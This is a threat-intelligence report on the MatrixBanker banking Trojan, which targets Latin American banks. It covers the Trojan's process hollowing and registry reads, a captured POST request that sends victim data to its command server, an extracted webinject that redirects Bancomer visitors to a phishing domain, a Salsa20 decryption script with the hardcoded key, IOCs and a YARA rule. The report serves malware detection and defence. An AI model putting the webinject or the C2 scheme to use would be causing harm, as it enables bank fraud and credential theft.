New Trojan on stage, MatrixBankerSpecialist: Luis Angel Fernandez

www.aiuken.com

F O C U S E D O N AT TA C K I N G B A N K S .

MATRIX BANKER ANALYSEAlthough it is a banking malware, still in evolution, it already exist samples in services like VirusTotal identified by the different antivirus of the industry.Preliminary investigations of this malware family indicate that the initial infection occurred from Mexican web domains and no other infection pathways have been detected such as ExploitsKits or SPAM campaigns.

ZEUS TYPE CONFIGURATIONS• Many of the Trojans that have appeared after ZeuS have collected their same

pattern to make the configurations or injections.• This makes it easier for buyers of malware kits to reuse injections or

configurations between different malware families.• Some of the observed families that use ZeuS configurations are the most used

today to attack financial entities.

DMCC I5 Premium Business Centre, Gold Tower, JLTDubaiUnited Arab Emirates

Phone: +971 54 499 4659

New Trojan on stage, MatrixBanker focused on attacking banks.Specialist: Luis Angel Fernandez August 2017

A new banking Trojan has been discovered. At the moment, it only targets banks in Latin America. It has recently been discovered a banking trojan known as «MatrixBanker». Little is known of it, as now and after the investigations made, C2 servers are still not very inactive and there are no records of major attacks, nor have binaries been observed, so they are expected to be studying the various financial institutions in order to start a campaign in the near future.

A recent investigation has revealed the banking Trojan known as «MatrixBanker». This Trojan has at the moment a very minority presence compared to other families of banking malware such as «Panda Zeus”, “Gozi”, variants of “ZeuS”, “Dridex”, etc. In the investigation that has been carried out only references

of affectation have been found to banks of Mexico and Peru, although recent binaries also affect international banks like HSBC. It is said that the Trojan is in development and testing phase, since each configuration affects at the moment few banks and is not distributing the binary in a massive way.

For now MatrixBanker targets entities in Latin America

ZeuS type configurations• Many of the Trojans that have appeared after ZeuS have collected their

same pattern to make the configurations or injections.• This makes it easier for buyers of malware kits to reuse injections or

configurations between different malware families.• Some of the observed families that use ZeuS configurations are the most

used today to attack financial entities.• The different groups have adopted the same format or very similar thanks

to the versatility they offer and the facility to adapt it to new objectives.• The adoption by the groups was due to the different ZeuS source code

leaks.

MatrixBanker:

Not many of the internal details of this new family of bank malware are known yet, but it has been possible to name the family thanks to the image that shows the control panel of the Trojan:

As noted in the login panel the word «MatrixBanker» is displayed. It should be noted that the part of web administrator had already been observed previously in an earlier sample to MatrixBanker known as «Win32 / RediModiUpd». MatrixBanker-infected computers are easily identifiable thanks to the Mutex they leave inside the system and also to the persistence method they use within the system.

Matrix Banker Analyse

Although it is a banking malware, still in evolution, it already exist samples in services like VirusTotal identified by the different antivirus of the industry.Preliminary investigations of this malware family indicate that the initial infection occurred from Mexican web domains and no other infection pathways have been detected such as ExploitsKits or SPAM campaigns.

4 Aiuken Cybersecurity 2017

The execution of MatrixBanker does not differ from other families of malware of the same category:

The running process will read information from the system where it is running:

• It reads the “Windows Product ID”:It accesses the following running registry keys:“<Input Sample>” (Path: “HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION”; Key: “PRODUCTID”)“msiexec.exe” (Path: “HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION”; Key: “PRODUCTID”)“extra_carved_0.exe” (Path: “HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION”; Key: “PRODUCTID”)• Obtaining the video version of i / o BIOS: msiexec.exe” (Path: “HKLM\HARDWARE\DESCRIPTION\SYSTEM”; Key: “SYSTEMBIOSVERSION”)• Obtaining the Runtime Environment: “msiexec.exe” (Path: “HKCU\SOFTWARE\VMWARE, INC.”)• Changes in memory access to remote processes:“<Input Sample>” changed protection rights in “C:\eb483d4f8c71a234f70b490bb38d841c72453ed5c9bb0049d9affd2afe 41cf23.exe” (Handle: 76) (Protection: “execute/read/write”)“<Input Sample>” changed protection rights in “C:\eb483d4f8c71a234f70b490bb38d841c72453ed5c9bb0049d9affd2afe 41cf23.exe” (Handle: 76) (Protection: “read/write”)• Using Process Hollowing in Execution:

“<Input Sample>” set thread context in remote process “C:\eb483d4f8c71a234f70b490bb38d841c72453ed5c9bb0049d9affd2afe 41cf23.exe” (PID 00000b0c)• Writing data in remote processes:“<Input Sample>” wrote 32 bytes to a remote process “C:\eb483d4f8c71a234f70b490bb38d841c72453ed5c9bb0049d9affd2afe 41cf23.exe” (Handle: 76)“<Input Sample>” wrote 52 bytes to a remote process “C:\

5New Trojan on stage, MatrixBanker focused on attacking banks in LATAM.

eb483d4f8c71a234f70b490bb38d841c72453ed5c9bb0049d9affd2afe 41cf23.exe” (Handle: 76)“<Input Sample>” wrote 4 bytes to a remote process “C:\eb483d4f8c71a234f70b490bb38d841c72453ed5c9bb0049d9affd2afe 41cf23.exe” (Handle: 76)“<Input Sample>” wrote 1024 bytes to a remote process “C:\eb483d4f8c71a234f70b490bb38d841c72453ed5c9bb0049d9affd2afe 41cf23.exe” (Handle: 76)“<Input Sample>” wrote 4096 bytes to a remote process “C:\eb483d4f8c71a234f70b490bb38d841c72453ed5c9bb0049d9affd2afe 41cf23.exe” (Handle: 76)“<Input Sample>” wrote 1536 bytes to a remote process “C:\eb483d4f8c71a234f70b490bb38d841c72453ed5c9bb0049d9affd2afe 41cf23.exe” (Handle: 76)“<Input Sample>” wrote 512 bytes to a remote process “C:\eb483d4f8c71a234f70b490bb38d841c72453ed5c9bb0049d9affd2afe 41cf23.exe” (Handle: 76)“<Input Sample>” wrote 194560 bytes to a remote process “C:\eb483d4f8c71a234f70b490bb38d841c72453ed5c9bb0049d9affd2afe 41cf23.exe” (Handle: 76)“<Input Sample>” wrote 1500 bytes to a remote process “%WINDIR%\System32\msiexec.exe” (Handle: 412)“<Input Sample>” wrote 4 bytes to a remote process “%WINDIR%\System32\msiexec.exe” (Handle: 412)“<Input Sample>” wrote 32 bytes to a remote process “%WINDIR%\System32\msiexec.exe” (Handle: 412)“<Input Sample>” wrote 52 bytes to a remote process “%WINDIR%\System32\msiexec.exe” (Handle: 412)

6 Aiuken Cybersecurity 2017

• It reads the machine name:“<Input Sample>” (Path: “HKLM\SYSTEM\CONTROLSET001\CONTROL\COMPUTERNAME\ACTIVEC OMPUTERNAME”; Key: “COMPUTERNAME”)“msiexec.exe” (Path: “HKLM\SYSTEM\CONTROLSET001\CONTROL\COMPUTERNAME\ACTIVEC OMPUTERNAME”; Key: “COMPUTERNAME”)“extra_carved_0.exe” (Path: “HKLM\SYSTEM\CONTROLSET001\CONTROL\COMPUTERNAME\ACTIVEC OMPUTERNAME”; Key: “COMPUTERNAME”)• Extract the GUID of the machine:“msiexec.exe” (Path: “HKLM\SOFTWARE\MICROSOFT\CRYPTOGRAPHY”; Key: “MACHINEGUID”)• Sending data to the C & C:

POST /forum/logout.php HTTP/1.1 Content-Type: application/x-www-form- urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC6.0; .NET4.0C; .NET4.0E; InfoPath.3) Host: eaxsess.catContent-Length: 1070 Cache-Control: no-cacherofctqneb=c80a3d37bc00f5880a8417ccc35fad3ddc 2d50c412c2&pkzujez=97035447&tslkd=5e514fd1d e0f585769ee0bfb3a4a0f22332b548d3b2c78d4eda fac653e8c6343443daf2d24b068522da0c5c358245 bd3d9a8930c791458c185c97430ab32ef6a2f47f2fa 7d6168f1b0d86544f8458457a62f1f0ea6882d9812 45c9daf717ff5ed143977908774d0cd3759af3a09cb db77316157c77a963ca421bee763b0bc44b2919c1 0c65016aa568dcf39e0ecd96ca71ee89b4b82bcf76 346dea58ed81e833a82563594a3b6ad1b6b02e9d1 b9977b0e42c13857aeab6cb8abb4a39d22d08f619 01674c6682378e5076269f1bbc7df47e9ff9e96fc71 1b5be4716a9881c7d8fd134a8fb11635872727909a 6f4f16fa37d68b9b267acc5fde6224af6588c2566cb 6eb1efb52fd3bc5a21a2fb1a79ca2141b89a5f3b181 eca472735d541fc91787a88598b&vwrsnop1=727E 3928432B020A502921194525393C54320C1B5464 210A5832000A1117000C4434391B082D5C010835 164108251C111F211D1D31&vwrsnop2=58211D08 5D2B171D1F211D1D31&vwrsnop3=652D0B1A506 9353B6D100C16532565&vwrsnop4=782A111D5D6 C375111070A0A546C313518640C4F1C70524F010F 453B6111453811774B4D01032D0231&vwrsnop5= 672D170C4425093A5E3C453F4325151058271658 7020040845211778&vwrsnop6=7C73543C416951 417D69292856713F3B5669513061762378

7New Trojan on stage, MatrixBanker focused on attacking banks in LATAM.

• Loading the Execution File:

8 Aiuken Cybersecurity 2017

• Anti-debug methods implemented within the sample:

9New Trojan on stage, MatrixBanker focused on attacking banks in LATAM.

Matrixbanker Configuration:

At the moment, MatrixBanker data have been reported to banks in Mexico and Peru, although some of the latest variants have been found to affect HSBC.During the analysis the configuration of one of the MatrixBanker samples was extracted:

targeturl=*bancomer.com/empresas*&br&&br&<meta http-equiv=»refresh» content=»0; url=https://16bbanet.com/index.jsp/» />&br&<script>&br&top.location.href=»https://16bbanet.com/index.jsp/»;&br&</script>

As we can see, this sample of MatrixBanker analyzed affects the Bancomer and BBANet entities.In the interaction of the infected machine with the affected financial entity, the connection is started to obtain the part of WebConfig and to carry out the attack of Man in the Browser:

The request to the web server is made using aSalsa20 encryption type. It is the first malware that has been seen using this type of encryption in malware communications with the command and control server.The following script can be used in Python To get clear communications:

import sys

# https://pypi.python.org/pypi/salsa20/0.3.0import salsa20

fp = open(sys.argv[1], «rb»)data = fp.read()fp.close()

iv = «K\x84\x8eH\xf1]E\xa5»key = «\xa1\x9cA\x89\xb4\x9d\x15ae\xf1a\x8bLQj\x16\xf1l\x18\x1d\x81\xb8\x18\x18\xe1\x81e\x1c!\xb8\\e»

data_nohex = data.replace(«\n», «»).decode(«hex»)plain = salsa20.Salsa20_xor(data_nohex, iv, key)print plain

10 Aiuken Cybersecurity 2017

So far the key and the initialization vector (IV) have been the same for all the samples we have analyzed.Although functional, the webinject format seems to be under construction. The previous samples use a different and simpler format and there is a lot of work to be done to catch up with industry standard Zeus webinjects. The rules are «\ n» separated and there are two types: «rule1» and «rule2». For the moment, we have only seen «rule 2». The target financial institution is specified in «targeturl». The rest of the pieces, which are «& br &» delimited, are finally concatenated and injected into the page if the browser visits a destination URL.

IOCsMD505a4fbfacc9774acbb778070956b9acf 0d07363187dcda999e1a6e750ed7a57a ab2b418b43d59623af082db78402266d4db81441 c0f122be90c55a2e091066fb631f7cfc

C2:hxxp://5.206.225[.]25/api/ping.phphxxp://eaxsess[.]cat/concat/api/ping.phphxxp://gagaxx[.]cat/concat/api/ping.phphxxp://nknkd[.]cat/redir/api/ping.phphxxp://trtr44[.]cat/concat/api/ping.phphxxp://drdrfdd[.]cat/concat/api/ping.php

11New Trojan on stage, MatrixBanker focused on attacking banks in LATAM.

YARA rules:

import «pe»

rule matrix_banker { meta: description = «Regla para detectar Matrix Banker» author = «Aiuken Solutions» strings: $x1 = «C:\\Users\\W7\\Downloads\\kur\\Redir\\Bin\\Loader.pdb» fullword ascii $x2 = «C:\\Users\\W7\\Downloads\\kur\\Redir\\Bin\\main_64.pdb» fullword ascii $x3 = «[INJECT] inject_via_remotethread_wow64: pExecuteX64=0x%08p, pX64function=0x%08p, ctx=0x%08p» fullword ascii $x4 = «OPERA.EXE» fullword ascii $s5 = «CHROME.DLL» fullword ascii $s6 = «Content-Disposition: form-data; name=\»upload_file\»; filename=\»%s\»» fullword ascii $s7 = «NSPR4.DLL» fullword ascii $s8 = «NSS3.DLL» fullword ascii $s9 = «Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko» fullword ascii $s10 = «main_64.dll» fullword ascii $s11 = «main_32.dll» fullword ascii $s12 = «targeturl=» fullword ascii $s13 = «LoaderMutex» fullword ascii $s14 = «cn.bing.com» fullword ascii $s15 = «SOFTWARE\\AppDataLow\\» fullword ascii $s16 = «CreateRemoteThread Success» fullword ascii $s17 = «Content-Security-Policy:» fullword ascii $s18 = «concat/api/ping.php?uuid=%s&country=%s» fullword ascii $s19 = «ReflectiveLoader» fullword ascii $s20 = «_ReflectiveLoader@20» fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 1000KB and pe.imphash() == «4f9a1b151e9e33915dff4c4ef5ac0a41» and ( 1 of ($x*) or 4 of ($s*) ) ) or ( all of them )}

12 Aiuken Cybersecurity 2017

Feel free to contact us:

Get the latest notifications and updates from Aiuken.

Subscribe via email

OVANES MIKHAYLOVINTERNATIONAL BUSINESS DEVELOPMENT DIRECTOR

ovanes@aiuken.com

www.aiuken.com/uae

DMCC I5 Premium Business Centre, Gold Tower, JLTDubaiUnited Arab EmiratesPhone: +971 54 499 4659